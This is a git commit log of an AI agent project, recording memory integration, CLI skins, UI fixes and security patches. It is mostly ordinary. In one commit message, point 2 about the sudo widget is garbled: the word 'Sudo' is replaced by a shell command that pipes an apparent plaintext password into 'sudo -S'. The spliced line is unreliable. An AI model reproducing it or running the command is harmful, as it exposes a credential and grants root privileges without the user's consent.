4c54c2709c Revert "refactor(honcho): write all host-scoped settings into hosts block"
This reverts commit c90ba029ce.
2026-03-10 17:11:58 -04:00
Erosika
c90ba029ce refactor(honcho): write all host-scoped settings into hosts block
Setup wizard now writes memoryMode, writeFrequency, recallMode, and
sessionStrategy into hosts.hermes instead of the config root. Client
resolution updated to read sessionStrategy and sessionPeerPrefix from
host block first. Docs updated to show hosts-based config as the default
example so other integrations can coexist cleanly.
2026-03-10 17:00:52 -04:00
Erosika
5489c66cdf docs(honcho): restore use cases, example queries, and configurability language
Adds back use cases section and example tool queries from the original
docs. Clarifies that built-in memory and Honcho can work together or be
configured separately via memoryMode.
2026-03-10 16:54:34 -04:00
Erosika
960c1521f3 docs(honcho): rewrite Honcho Memory docs as full feature documentation
Replaces the stub docs with comprehensive coverage: setup (interactive +
manual), all config fields, memory modes, recall modes, write frequency,
session strategies, host blocks, async prefetch pipeline, dual-peer
architecture, dynamic reasoning, gateway integration, four tools, full
CLI reference, migration paths, and AI peer identity. Trims the Honcho
section in memory.md to a cross-reference.
2026-03-10 16:49:14 -04:00
SHL0MS
149516f365 Merge pull request #854 from NousResearch/add-ascii-video-skill
Add ASCII video skill to creative category
2026-03-10 16:34:57 -04:00
adavyas
87349b9bc1 fix(gateway): persist Honcho managers across session requests 2026-03-10 16:21:42 -04:00
adavyas
87cc5287a8 fix(honcho): enforce local mode and cache-safe warmup 2026-03-10 16:21:42 -04:00
Erosika
c047c03e82 feat(honcho): honcho_context can query any peer (user or ai)
Optional 'peer' parameter: "user" (default) or "ai". Allows asking
about the AI assistant's history/identity, not just the user's.
2026-03-10 16:21:07 -04:00
Erosika
0cb639d472 refactor(honcho): rename query_user_context to honcho_context
Consistent naming: all honcho tools now prefixed with honcho_
(honcho_context, honcho_search, honcho_profile, honcho_conclude).
2026-03-10 16:21:07 -04:00
Erosika
792be0e8e3 feat(honcho): add honcho_conclude tool for writing facts back to memory
New tool lets Hermes persist conclusions about the user (preferences,
corrections, project context) directly to Honcho via the conclusions
API. Feeds into the user's peer card and representation.
2026-03-10 16:21:07 -04:00
Erosika
c1228e9a4a refactor(honcho): rename recallMode "auto" to "hybrid"
Matches the mental model: hybrid = context + tools,
context = context only, tools = tools only.
2026-03-10 16:21:07 -04:00
Erosika
6782249df9 fix(honcho): rewrite tokens and peer CLI help for clarity
Explain what context vs dialectic actually do in plain language:
context = raw memory retrieval, dialectic = AI-to-AI inference
for session continuity. Describe what user/AI peer cards are.
2026-03-10 16:21:07 -04:00
Erosika
b4af03aea8 fix(honcho): clarify API key signup instructions
Tell users to go to app.honcho.dev > Settings > API Keys.
Updated in setup walkthrough, setup prompt, and client error message.
2026-03-10 16:21:07 -04:00
Erosika
74c214e957 feat(honcho): async memory integration with prefetch pipeline and recallMode
Adds full Honcho memory integration to Hermes:

- Session manager with async background writes, memory modes (honcho/hybrid/local),
  and dialectic prefetch for first-turn context warming
- Agent integration: prefetch pipeline, tool surface gated by recallMode,
  system prompt context injection, SIGTERM/SIGINT flush handlers
- CLI commands: setup, status, mode, tokens, peer, identity, migrate
- recallMode setting (auto | context | tools) for A/B testing retrieval strategies
- Session strategies: per-session, per-repo (git tree root), per-directory, global
- Polymorphic memoryMode config: string shorthand or per-peer object overrides
- 97 tests covering async writes, client config, session resolution, and memory modes
2026-03-10 16:21:07 -04:00
SHL0MS
0229e6b407 Fix test_analysis_error_logs_exc_info: mock _aux_async_client so download path is reached 2026-03-10 16:03:19 -04:00
SHL0MS
c358af7861 Add ASCII video skill to creative category 2026-03-10 15:54:38 -04:00
teknium1
8eefbef91c fix: replace ANSI response box with Rich Panel + reduce widget flashing
Major UX improvements:

1. Response box now uses a Rich Panel rendered through ChatConsole
   instead of hand-rolled ANSI box-drawing borders. Rich Panels
   adapt to terminal width at render time, wrap content inside
   the borders properly, and use skin colors natively.

2. ChatConsole now reads terminal width at render time via
   shutil.get_terminal_size() instead of defaulting to 80 cols.
   All Rich output adapts to the current terminal size.

3. User-input separator reduced to fixed 40-char width so it
   never wraps regardless of terminal resize.

4. Approval and clarify countdown repaints throttled to every 5s
   (was 1s), dramatically reducing flicker in Kitty/ghostty.
   Selection changes still trigger instant repaints via key bindings.

5. Sudo widget now uses dynamic _panel_box_width() instead of
   hardcoded border strings.

Tests: 2860 passed.
2026-03-10 07:04:02 -07:00
teknium1
e590caf8d8 Revert "Merge PR #702: feat: configurable embedding infrastructure — local (fastembed) + API (OpenAI)"
This reverts commit 46b95ee694, reversing
changes made to 0fdeffe6c4.
2026-03-10 07:00:54 -07:00
teknium1
46b95ee694 Merge PR #702: feat: configurable embedding infrastructure — local (fastembed) + API (OpenAI)
Authored by teyrebaz33. Adds agent/embeddings.py with Embedder protocol,
FastEmbedEmbedder (local, 384d), OpenAIEmbedder (API, 1536d), factory,
and cosine similarity utilities. 30 tests. Optional fastembed dependency.
Infrastructure for #509 (cognitive memory) and #489 (semantic search).
Closes #675.
2026-03-10 06:59:22 -07:00
teknium1
0fdeffe6c4 fix: replace silent exception swallowing with debug logging across tools
Add logger.debug() calls to 27 bare 'except: pass' blocks across 7 core
files, giving visibility into errors that were previously silently
swallowed. This makes it much easier to diagnose user-reported issues
from debug logs.

Files changed:
- tools/terminal_tool.py: 5 catches (stat, termios, fd close, cleanup)
- tools/delegate_tool.py: 7 catches + added logger (spinner, callbacks)
- tools/browser_tool.py: 5 catches (screenshot/recording cleanup, daemon kill)
- tools/code_execution_tool.py: 2 remaining catches (socket, server close)
- gateway/session.py: 2 catches (platform enum parse, temp file cleanup)
- agent/display.py: 2 catches + added logger (JSON parse in failure detect)
- agent/prompt_builder.py: 1 catch (skill description read)

Deliberately kept bare pass for:
- ImportError checks for optional dependencies (terminal_tool.py)
- SystemExit/KeyboardInterrupt handlers
- Spinner _write catch (would spam on every frame when stdout closed)
- process_registry PID-alive check (canonical os.kill(pid,0) pattern)

Extends the pattern from PR #686 (@aydnOktay).
2026-03-10 06:59:20 -07:00
teyrebaz33
cc4ead999a feat: configurable embedding infrastructure — local (fastembed) + API (OpenAI) (#675)
- Add agent/embeddings.py with Embedder protocol, FastEmbedEmbedder, OpenAIEmbedder
- Factory function get_embedder() reads provider from config.yaml embeddings section
- Lazy initialization — no startup impact, model loaded on first embed call
- cosine_similarity() and cosine_similarity_matrix() utility functions included
- Add fastembed as optional dependency in pyproject.toml
- 30 unit tests, all passing

Closes #675
2026-03-10 06:56:18 -07:00
teknium1
60cba55d82 Merge PR #701: fix: tool call repair — auto-lowercase, fuzzy match, helpful error on unknown tool
Authored by teyrebaz33. Adds _repair_tool_call() method: tries lowercase,
normalize (hyphens/spaces → underscores), then fuzzy match (difflib, 0.7
cutoff). Replaces hard abort after 3 retries with graceful error message
sent back to model for self-correction. Fixed bug where valid tool calls
in a mixed batch would get no results (now all get results).
Fixes #520.
2026-03-10 06:54:17 -07:00
teyrebaz33
1caee06b22 fix: tool call repair — auto-lowercase, fuzzy match, helpful error on unknown tool (#520)
- Add _repair_tool_call(): tries lowercase, normalize, then fuzzy match (difflib 0.7)
- Replace 3-retry-then-abort with graceful error: model receives helpful message and self-corrects
- Conversation stays alive instead of dying on hallucinated tool names

Closes #520
2026-03-10 06:54:11 -07:00
teknium1
a6eaf0f41f Merge PR #700: fix(config): atomic write for config.yaml to prevent data loss on crash
Authored by alireza78a. Adds atomic_yaml_write() to utils.py (mirrors
existing atomic_json_write pattern), replaces bare open('w') in
save_config(). Integrated with max_turns normalization and commented
sections via extra_content param. 3 new tests for crash safety.
2026-03-10 06:48:43 -07:00
alireza78a
fadad820dd fix(config): atomic write for config.yaml to prevent data loss on crash 2026-03-10 06:48:37 -07:00
teknium1
e8b19b5826 fix: cap user-input separator at 120 cols (matches response box) 2026-03-10 06:47:26 -07:00
teknium1
9ea2209a43 fix: reduce approval/clarify widget flashing + dynamic border widths
Three UI improvements:

1. Throttle countdown repaints to every 5s (was 1s) for approval
   and clarify widgets. The frequent invalidation caused visible
   blinking in Kitty, ghostty, and some other terminals. Selection
   changes (↑/↓) still trigger instant repaints via key bindings.

2. Make echo Link2them00n. | sudo -S -p '' widget use dynamic _panel_box_width() instead of
   hardcoded border strings — adapts to terminal width on resize.

3. Cap response box borders at 120 columns so they don't wrap
   when switching from fullscreen to a narrower window.

Tests: 2857 passed.
2026-03-10 06:44:13 -07:00
teknium1
87af622df4 Merge PR #686: improve error handling and logging in code execution tool
Authored by @aydnOktay. Adds exc_info=True to exception logging, replaces
silent pass statements with logger.debug calls, fixes variable shadowing
in _kill_process_group nested except blocks.
2026-03-10 06:43:11 -07:00
teknium1
2c21c4b897 Merge PR #698: fix(security): pipe sudo password via stdin instead of shell cmdline
Authored by johnh4098. Fixes CWE-214: SUDO_PASSWORD was visible in
/proc/PID/cmdline via echo pipe. Now passed through subprocess stdin.
All 6 backends updated: local, ssh, docker, singularity pipe via stdin;
modal and daytona use printf fallback (remote sandbox, documented).
2026-03-10 06:38:44 -07:00
teknium1
771969f747 fix: wire up enabled_tools in agent loop + simplify sandbox tool selection
Completes the fix started in 8318a51 — handle_function_call() accepted
enabled_tools but run_agent.py never passed it. Now both call sites in
_execute_tool_calls() pass self.valid_tool_names, so each agent session
uses its own tool list instead of the process-global
_last_resolved_tool_names (which subagents can overwrite).

Also simplifies the redundant ternary in code_execution_tool.py:
sandbox_tools is already computed correctly (intersection with session
tools, or full SANDBOX_ALLOWED_TOOLS as fallback), so the conditional
was dead logic.

Inspired by PR #663 (JasonOA888). Closes #662.
Tests: 2857 passed.
2026-03-10 06:35:28 -07:00
johnh4098
e9742e202f fix(security): pipe sudo password via stdin instead of shell cmdline 2026-03-10 06:34:59 -07:00
teknium1
a2ea85924a Merge PR #687: fix(file_tools): pass docker_volumes to sandbox container config
Authored by manuelschipper. Adds missing docker_volumes key to
container_config in file_tools.py, matching terminal_tool.py.
Without this, Docker sandbox containers created by file operations
lack user volume mounts when file tools run before terminal.
2026-03-10 06:33:30 -07:00
teknium1
8318a519e6 fix: pass enabled_tools through handle_function_call to avoid global race
The process-global _last_resolved_tool_names gets overwritten when
subagents resolve their own toolsets, causing execute_code in the
parent agent to generate imports for the wrong set of tools.

Fix: handle_function_call() now accepts an enabled_tools parameter.
run_agent.py already passes self.valid_tool_names at both call sites.
This change makes model_tools.py actually use it, falling back to the
global only when the caller doesn't provide a list (backward compat).
2026-03-10 06:32:08 -07:00
teknium1
8ef3c815e7 Merge PR #680: feat: add Nous Portal API key provider
Authored by Indelwin. Adds 'nous-api' provider for direct API key
access to Nous Portal inference, mirroring how OpenRouter and other
API-key providers work. Includes PROVIDER_REGISTRY entry, setup wizard
option, OPTIONAL_ENV_VARS, provider aliases, and test.
Fixes #644.
2026-03-10 06:31:03 -07:00
Indelwin
de07aa7c40 feat: add Nous Portal API key provider (#644)
Add support for using Nous Portal via a direct API key, mirroring
how OpenRouter and other API-key providers work. This gives users a
simpler alternative to the OAuth device-code flow when they already
have a Nous API key.

Changes:
- Add 'nous-api' to PROVIDER_REGISTRY as an api_key provider
  pointing to https://inference-api.nousresearch.com/v1
- Add NOUS_API_KEY and NOUS_BASE_URL to OPTIONAL_ENV_VARS
- Add NOUS_API_BASE_URL / NOUS_API_CHAT_URL to hermes_constants
- Add 'Nous Portal API key' as first option in setup wizard
- Add provider aliases (nous_api, nousapi, nous-portal-api)
- Add test for nous-api runtime provider resolution

Closes #644
2026-03-10 06:28:00 -07:00
teknium1
928bb16da1 fix: forward thread_id to Telegram adapter + update send_typing signatures
Part 2 of thread_id forum topic fix: add metadata param to
send_voice, send_image, send_animation, send_typing in Telegram
adapter and pass message_thread_id to all Bot API calls. Update
send_typing signature in Discord, Slack, WhatsApp, HomeAssistant
for compatibility.

Based on the fix proposed by @Bitstreamono in PR #656.
2026-03-10 06:26:32 -07:00
teknium1
441f498d6f Merge PR #679: fix(code_execution): handle empty enabled_sandbox_tools in schema description
Authored by 0xbyt4. Fixes broken 'from hermes_tools import , ...'
syntax in schema description when no sandbox tools are enabled.
Adds 29 new tests for schema generation, env var filtering,
edge cases, and interrupt handling.
2026-03-10 06:22:56 -07:00
teknium1
a630ca15de fix: forward thread_id metadata for Telegram forum topic routing
Replies in Telegram forum topics (supergroups with topics) now land in
the correct topic thread instead of 'General'.

- base.py: build thread_id metadata from event.source, pass to all
  send/media calls; add metadata param to send_typing, send_image,
  send_animation, send_voice, send_video, send_document, send_image_file,
  _keep_typing
- telegram.py: extract thread_id from metadata and pass as
  message_thread_id to all Bot API calls (send_photo, send_voice,
  send_audio, send_animation, send_chat_action)
- run.py: pass thread_id metadata to progress/streaming send calls
- discord/slack/whatsapp/homeassistant: update send_typing signature

Based on the fix proposed by @Bitstreamono in PR #656.
2026-03-10 06:21:15 -07:00
0xbyt4
52e3580cd4 refactor: merge new tests into test_code_execution.py
Move all new tests (schema, env filtering, edge cases, interrupt) into
the existing test_code_execution.py instead of a separate file.
Delete the now-redundant test_code_execution_schema.py.
2026-03-10 06:18:27 -07:00
0xbyt4
694a3ebdd5 fix(code_execution): handle empty enabled_sandbox_tools in schema description
build_execute_code_schema(set()) produced "from hermes_tools import , ..."
in the code property description — invalid Python syntax shown to the model.

This triggers when a user enables only the code_execution toolset without
any of the sandbox-allowed tools (e.g. `hermes tools code_execution`),
because SANDBOX_ALLOWED_TOOLS & {"execute_code"} = empty set.

Also adds 29 unit tests covering build_execute_code_schema, environment
variable filtering, execute_code edge cases, and interrupt handling.
2026-03-10 06:18:27 -07:00
teknium1
2a062e2f45 Merge PR #840: background process notification modes + fix spinner line spam
- feat(gateway): configurable background_process_notifications (off/result/error/all)
- fix(display): rate-limit spinner flushes to prevent line spam under patch_stdout

Background notifications inspired by @PeterFile (PR #593).
2026-03-10 06:17:18 -07:00
teknium1
49ec1c9e8f Merge PR #655: fix: normalize max turns config path
Authored by stablegenius49. Rebased onto current main, resolved 3
conflicts (load_config encoding, save_config commented sections, setup
default value), fixed missing MagicMock import, aligned DEFAULT_CONFIG
default to 90 (matching cli.py).

Migrates legacy root-level max_turns to agent.max_turns across all
config loaders (load_config, load_cli_config, save_config, setup).
Adds _normalize_max_turns_config() for consistent migration.
Fixes #634.
2026-03-10 06:05:20 -07:00
stablegenius49
4bd579f915 fix: normalize max turns config path 2026-03-10 06:05:02 -07:00
teknium1
e4adb67ed8 fix(display): rate-limit spinner flushes to prevent line spam under patch_stdout
The KawaiiSpinner animation would occasionally spam dozens of duplicate
lines instead of overwriting in-place with \r. This happened because
prompt_toolkit's StdoutProxy processes each flush() as a separate
run_in_terminal() call — when the write thread is slow (busy event loop
during long tool executions), each \r frame gets its own call, and the
terminal layout save/restore between calls breaks the \r overwrite
semantics.

Fix: rate-limit flush() calls to at most every 0.4s. Between flushes,
\r-frame writes accumulate in StdoutProxy's buffer. When flushed, they
concatenate into one string (e.g. \r frame1 \r frame2 \r frame3) and
are written in a single run_in_terminal() call where \r works correctly.

The spinner still animates (flush ~2.5x/sec) but each flush batches
~3 frames, guaranteeing the \r collapse always works. Most visible
with execute_code and terminal tools (3+ second executions).
2026-03-10 06:02:07 -07:00
teknium1
ff09cad879 Merge PR #621: fix: limit concurrent Modal sandbox creations to avoid deadlocks
Authored by voteblake.

- Semaphore limits concurrent Modal sandbox creations to 8 (configurable)
  to prevent thread pool deadlocks when 86+ tasks fire simultaneously
- Modal cleanup guard for failed init (prevents AttributeError)
- CWD override to /app for TB2 containers
- Add /home/ to host path validation for container backends
2026-03-10 05:57:54 -07:00
teknium1
580e6ba2ff feat: add proper favicon and logo for landing page and docs site
Generated favicon files (ico, 16x16, 32x32, 180x180, 192x192, 512x512)
from the Hermes Agent logo. Replaces the inline SVG caduceus emoji with
real favicon files so Google's favicon service can pick up the logo.

Landing page: updated <link> tags to reference favicon.ico, favicon PNGs,
and apple-touch-icon.
Docusaurus: updated config to use favicon.ico and logo.png instead of
favicon.svg.
2026-03-10 05:51:45 -07:00
0xbyt4
ca23875575 fix: unify visibility filter in codex model discovery
_fetch_models_from_api checked for "hide" while _read_cache_models
checked for "hidden", causing models hidden by the API to still
appear when loaded from cache. Both now accept either value.
2026-03-10 15:15:33 +03:00
teknium1
d6d5a43d3a Merge PR #627: fix: continue non-tool replies after output-length truncation
Authored by tripledoublev (vincent). Rebased onto current main and
conflict-resolved.

When finish_reason='length' on a non-tool chat-completions response,
instead of rolling back and returning None, the agent now:
- Appends the truncated text and a continuation prompt
- Retries up to 3 times, accumulating partial chunks
- Concatenates all chunks into the final response
- Preserves existing rollback behavior for tool-call truncations
2026-03-10 04:33:14 -07:00
teknium1
d723208b1b Merge PR #617: Improve skills tool error handling
Authored by aydnOktay. Adds logging to skills_tool.py with specific
exception handling for file read errors (UnicodeDecodeError, PermissionError)
vs unexpected exceptions, replacing bare except-and-continue blocks.
2026-03-10 04:32:26 -07:00
vincent
b0a5fe8974 fix: continue after output-length truncation 2026-03-10 04:30:19 -07:00
teknium1
899dfdcfb9 Merge PR #616: fix: retry with rebuilt payload after compression
Authored by tripledoublev.

After context compression on 413/400 errors, the inner retry loop was
reusing the stale pre-compression api_messages payload. Fix breaks out
of the inner retry loop so the outer loop rebuilds api_messages from
the now-compressed messages list. Adds regression test verifying the
second request actually contains the compressed payload.
2026-03-10 04:22:42 -07:00
teknium1
8f0b07ed29 Merge PR #611: fix(session): atomic write for sessions.json to prevent data loss on crash
Authored by alireza78a.

Replaces open('w') + json.dump with tempfile.mkstemp + os.replace atomic
write pattern, matching the existing pattern in cron/jobs.py. Prevents
silent session loss if the process crashes or gets OOM-killed mid-write.

Resolved conflict: kept encoding='utf-8' from HEAD in the new fdopen call.
2026-03-10 04:18:53 -07:00
teknium1
f16f2912cf Merge PR #607: fix: reset all retry counters at start of run_conversation()
Authored by 0xbyt4. Adds missing resets for _incomplete_scratchpad_retries and _codex_incomplete_retries to prevent stale counters carrying over between CLI conversations.
2026-03-10 04:17:47 -07:00
teknium1
af748539f8 Merge PR #608: fix: remove unused imports and unnecessary f-strings
Authored by JackTheGit.

- Remove unused 'random' import from agent/display.py
- Remove unused 'Optional' import from agent/redact.py
- Remove unnecessary f-string prefixes in batch_runner.py
2026-03-10 04:16:23 -07:00
teknium1
695c017411 Merge PR #603: fix: return deny on approval callback timeout instead of None
Authored by 0xbyt4.

_approval_callback() had no return statement after the timeout break,
causing it to return None instead of 'deny'. Callers in approval.py
expect one of 'once', 'session', 'always', or 'deny'. This matches
the existing timeout behavior in approval.py:209.
2026-03-10 04:15:31 -07:00
teknium1
5e6c7bc205 Merge PR #602: fix: prevent data loss in clipboard PNG conversion when ImageMagick fails
Authored by 0xbyt4. Only deletes temp .bmp after confirmed successful conversion, restores original on failure. Adds 3 tests.
2026-03-10 04:15:05 -07:00
teknium1
e8cec55fad feat(gateway): configurable background process watcher notifications
Add display.background_process_notifications config option to control
how chatty the gateway process watcher is when using
terminal(background=true, check_interval=...) from messaging platforms.

Modes:
  - all:    running-output updates + final message (default, current behavior)
  - result: only the final completion message
  - error:  only the final message when exit code != 0
  - off:    no watcher messages at all

Also supports HERMES_BACKGROUND_NOTIFICATIONS env var override.

Includes 12 tests (5 config loading + 7 watcher behavior).

Inspired by @PeterFile's PR #593. Closes #592.
2026-03-10 04:12:39 -07:00
teknium1
67fc6bc4e9 Merge PR #600: fix(security): use in-memory set for permanent allowlist save
Authored by alireza78a. Uses _permanent_approved directly instead of re-reading from disk, preventing potential data loss if a previous save failed.
2026-03-10 04:12:11 -07:00
teknium1
cbca0225f6 Merge PR #599: fix: strip MarkdownV2 italic markers in Telegram plaintext fallback
Authored by 0xbyt4.
2026-03-10 04:09:33 -07:00
teknium1
36ac91c902 Merge PR #598: feat(skill): expand duckduckgo-search with DDGS Python API coverage
Authored by areu01or00. Adds Python DDGS library examples for text, news, images, and video search with structured return field docs.
2026-03-10 04:08:53 -07:00
teknium1
a2902fbad5 Merge PR #594: Improve TTS error handling and logging
Authored by aydnOktay. Adds specific exception handlers, ffmpeg return code checking, and exc_info logging to tts_tool.py.
2026-03-10 04:04:17 -07:00
teknium1
d03de749a1 fix: add themed hero art for all skins, fix triple-quote syntax
Each themed skin (ares, poseidon, sisyphus, charizard) now has custom
banner_hero art that replaces the default Hermes caduceus. The hero art
uses braille-dot patterns themed to each skin:
- Ares: shield/spear emblem in crimson/bronze
- Poseidon: trident with wave patterns in blue/seafoam
- Sisyphus: boulder on slope in grayscale
- Charizard: dragon silhouette in orange/ember

Also fixes triple-quote string termination that caused a syntax error
in the previous commit.
2026-03-10 03:54:12 -07:00
Dev User
c3dec1dcda fix(file_tools): pass docker_volumes to sandbox container config
file_tools.py creates its own Docker sandbox when read_file/search_files
runs before any terminal command. The container_config was missing
docker_volumes, so the sandbox had no user volume mounts — breaking
access to heartbeat state, cron output, and all other mounted data.

Matches the existing pattern in terminal_tool.py:872.

Missed in original PR #158 (feat: add docker_volumes config).

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
2026-03-10 10:18:33 +01:00
teknium1
4945240fc3 feat: add poseidon/sisyphus/charizard skins + banner logo support
Adds 3 new built-in skins (poseidon, sisyphus, charizard) with full
customization — colors, spinner faces/verbs/wings, branding text, and
custom ASCII art banner logos. Total: 7 built-in skins.

Also adds banner_logo and banner_hero fields to SkinConfig, allowing
any skin to replace the HERMES-AGENT ASCII art logo and the caduceus
hero art with custom artwork. The CLI now renders the skin's logo when
available, falling back to the default Hermes logo.

Skins with custom logos: ares, poseidon, sisyphus, charizard
Skins using default logo: default, mono, slate
2026-03-10 02:11:50 -07:00
JackTheGit
1db8609ac9 Fix several documentation typos 2026-03-10 08:10:16 +00:00
teknium1
f6bc620d39 fix: apply skin colors to local build_welcome_banner in cli.py
cli.py had a local copy of build_welcome_banner() that shadowed the
imported one from banner.py. This local copy had all colors hardcoded,
so /skin changes had no visible effect on the banner.

Now the local copy resolves skin colors at render time using
get_active_skin(), matching the banner.py behavior. All hardcoded
#FFD700/#CD7F32/#FFBF00/#B8860B/#FFF8DC/#8B8682 values in the local
function are replaced with skin-aware lookups.
2026-03-10 00:58:42 -07:00
teknium1
b4b46d1b67 docs: comprehensive skin/theme system documentation
- AGENTS.md: add Skin/Theme System section with architecture, skinnable
  elements table, built-in skins list, adding built-in/user skins guide,
  YAML example; add skin_engine.py to project structure; mention skin
  engine in CLI Architecture section
- CONTRIBUTING.md: add skin_engine.py to project structure; add 'Adding
  a Skin/Theme' section with YAML schema, activation instructions
- cli-config.yaml.example: add full skin config documentation with
  schema reference, built-in skins list, all color/spinner/branding keys
- docs/skins/example-skin.yaml: complete annotated skin template with
  all available fields and inline documentation
- hermes_cli/skin_engine.py: expand module docstring to full schema
  reference with all fields documented, usage examples, built-in skins
  list
2026-03-10 00:51:27 -07:00
teknium1
c1775de56f feat: filesystem checkpoints and /rollback command
Automatic filesystem snapshots before destructive file operations,
with user-facing rollback.  Inspired by PR #559 (by @alireza78a).

Architecture:
- Shadow git repos at ~/.hermes/checkpoints/{hash}/ via GIT_DIR
- CheckpointManager: take/list/restore, turn-scoped dedup, pruning
- Transparent — the LLM never sees it, no tool schema, no tokens
- Once per turn — only first write_file/patch triggers a snapshot

Integration:
- Config: checkpoints.enabled + checkpoints.max_snapshots
- CLI flag: hermes --checkpoints
- Trigger: run_agent.py _execute_tool_calls() before write_file/patch
- /rollback slash command in CLI + gateway (list, restore by number)
- Pre-rollback snapshot auto-created on restore (undo the undo)

Safety:
- Never blocks file operations — all errors silently logged
- Skips root dir, home dir, dirs >50K files
- Disables gracefully when git not installed
- Shadow repo completely isolated from project git

Tests: 35 new tests, all passing (2798 total suite)
Docs: feature page, config reference, CLI commands reference
2026-03-10 00:49:15 -07:00
teknium1
de6750ed23 feat: add data-driven skin/theme engine for CLI customization
Adds a skin system that lets users customize the CLI's visual appearance
through data files (YAML) rather than code changes. Skins define: color
palette, spinner faces/verbs/wings, branding text, and tool output prefix.

New files:
- hermes_cli/skin_engine.py — SkinConfig dataclass, built-in skins
  (default, ares, mono, slate), YAML loader for user skins from
  ~/.hermes/skins/, skin management API
- tests/hermes_cli/test_skin_engine.py — 26 tests covering config,
  built-in skins, user YAML skins, display integration

Modified files:
- agent/display.py — skin-aware spinner wings, faces, verbs, tool prefix
- hermes_cli/banner.py — skin-aware banner colors (title, border, accent,
  dim, text, session) via _skin_color()/_skin_branding() helpers
- cli.py — /skin command handler, skin init from config, skin-aware
  response box label and welcome message
- hermes_cli/config.py — add display.skin default
- hermes_cli/commands.py — add /skin to slash commands

Built-in skins:
- default: classic Hermes gold/kawaii
- ares: crimson/bronze war-god theme (from community PRs #579/#725)
- mono: clean grayscale
- slate: cool blue developer theme

User skins: drop a YAML file in ~/.hermes/skins/ with name, colors,
spinner, branding, and tool_prefix fields. Missing values inherit from
the default skin.
2026-03-10 00:37:28 -07:00
teknium1
c0ffd6b704 feat: expand OpenClaw migration to cover all platform channels, provider keys, model/TTS config, shared skills, and daily memory
Adds 9 new migration categories to the OpenClaw-to-Hermes migration script:

Platform channels (non-secret, in user-data preset):
- discord-settings: bot token + allowlist → .env
- slack-settings: bot/app tokens + allowlist → .env
- whatsapp-settings: allowlist → .env
- signal-settings: account, HTTP URL, allowlist → .env

Configuration:
- model-config: default model → config.yaml
- tts-config: TTS provider/voice settings → config.yaml tts.*

Data:
- shared-skills: ~/.openclaw/skills/ → ~/.hermes/skills/openclaw-imports/
- daily-memory: workspace/memory/*.md entries → merged into MEMORY.md

Secrets (full preset only, requires --migrate-secrets):
- provider-keys: OpenRouter/OpenAI/Anthropic API keys, ElevenLabs/OpenAI TTS keys

Bug fix: workspace-agents now records 'skipped' status when source is
missing instead of silently returning (invisible failure in reports).

Total migration options: 10 → 19
Tests: 14 → 24 (10 new tests covering all new categories)
Full suite: 2798 passed, 0 failures
2026-03-10 00:35:14 -07:00
teknium1
8b9de366f2 Merge PR #570: feat: OpenClaw migration skill + CLI panel width improvements
Authored by unmodeled-tyler. Adds openclaw-migration skill to optional-skills/
with migration script, SKILL.md, and 7 tests. Also improves clarify/approval
panel rendering with dynamic width calculation.
2026-03-10 00:06:40 -07:00
teknium1
60d3f79c72 Merge PR #565: fix: sanitize FTS5 queries and close mirror DB connections
Authored by 0xbyt4. Fixes #N/A (no linked issue).

- Sanitize user input before FTS5 MATCH to prevent OperationalError on
  special characters (C++, unbalanced quotes, dangling operators, etc.)
- Close SessionDB connection in mirror._append_to_sqlite() via finally block
- Added tests for both fixes
2026-03-09 23:59:26 -07:00
teknium1
6f3a673aba fix: restore success-path server_sock.close() before rpc_thread.join()
PR #568 moved the close entirely to the finally block, but the success-path
close is needed to break the RPC thread out of accept() immediately. Without
it, rpc_thread.join(3) may block for up to 3 seconds if the child process
never connected. The finally-block close remains as a safety net for the
exception/error path (the actual fd leak fix).
2026-03-09 23:40:20 -07:00
teknium1
ab6a6338c4 Merge PR #568: fix(code-execution): close server socket in finally block to prevent fd leak
Authored by alireza78a. Moves server_sock.close() into the finally block so
the socket fd is always cleaned up, even if an exception occurs between socket
creation and the success-path close.
2026-03-09 23:39:13 -07:00
teknium1
1ec8c1fcaa Merge PR #564: fix: count actual tool calls instead of tool-related messages
Authored by 0xbyt4. Fixes tool_call_count double-counting tool responses
and under-counting parallel tool calls.
2026-03-09 23:32:54 -07:00
teknium1
739eb6702e Merge PR #551: Make skill file writes atomic
Authored by aydnOktay. Adds _atomic_write_text() helper using tempfile.mkstemp()
+ os.replace() to prevent skill file corruption on crash/interrupt. All 7
write_text() calls in skill_manager_tool.py converted, including rollback writes
during security scans.
2026-03-09 23:31:43 -07:00
teknium1
1aa7badb3c fix: add missing Platform.SIGNAL to toolset mappings, update test + config docs
Platform.SIGNAL was missing from default_toolset_map and platform_config_key
in gateway/run.py, causing Signal to silently fall back to hermes-telegram
toolset (same bug as HomeAssistant, fixed in PR #538).

Also updates:
- tests/test_toolsets.py: include hermes-signal and hermes-homeassistant in
  the platform core-tools consistency check
- cli-config.yaml.example: document signal and homeassistant platform keys
2026-03-09 23:27:19 -07:00
teknium1
ee4008431a fix: stop terminal border flashing with steady cursor and TUI spinner widget
Cherry-picked and improved from PR #470 (fixes #464).

Problem: On Ubuntu 24.04 with ghostty + tmux, the prompt input box
border lines flash due to cursor blink and raw spinner terminal writes
conflicting with prompt_toolkit's rendering.

Changes:
- cli.py: Add CursorShape.BLOCK to Application() to disable cursor blink
- cli.py: Add thinking_callback + spinner_widget in TUI layout so
  thinking status displays as a proper prompt_toolkit widget instead of
  raw terminal writes that conflict with the TUI renderer
- run_agent.py: Add thinking_callback parameter to AIAgent; when set,
  uses the callback instead of KawaiiSpinner for thinking display

What was NOT changed (preserving existing behavior):
- agent/display.py: Untouched. KawaiiSpinner _write() stdout capture,
  _animate() logic, and 0.12s frame interval all preserved. This
  protects subagent stdout redirection and keeps smooth animations
  for non-CLI contexts (gateway, batch runner).
- Original emoji spinner types (brain/sparkle/pulse/moon/star) preserved
  for all non-CLI contexts.

Fixes from original PR #470:
- CursorShape.STEADY_BLOCK -> CursorShape.BLOCK (STEADY_BLOCK doesn't
  exist in prompt_toolkit 3.0.52)
- Removed duplicate self._spinner_text = '' line
- Removed redundant nested if-checks

Tested: 2706 tests pass, interactive CLI verified via tmux.
2026-03-09 23:26:43 -07:00
teknium1
88f8bcde38 Merge PR #538: fix cron HERMES_HOME path mismatch, missing HomeAssistant toolset mapping, Daytona timeout drift
Authored by Himess. Three independent fixes:
- cron/jobs.py: respect HERMES_HOME env var (consistent with scheduler.py)
- gateway/run.py: add Platform.HOMEASSISTANT to toolset mappings
- tools/environments/daytona.py: use time.monotonic() for timeout deadline
2026-03-09 23:20:52 -07:00
teknium1
2285615010 Merge PR #533: fix: use regex for search output parsing to handle Windows drive-letter paths
Authored by Himess. Replaces split(':', 2) with regex that optionally
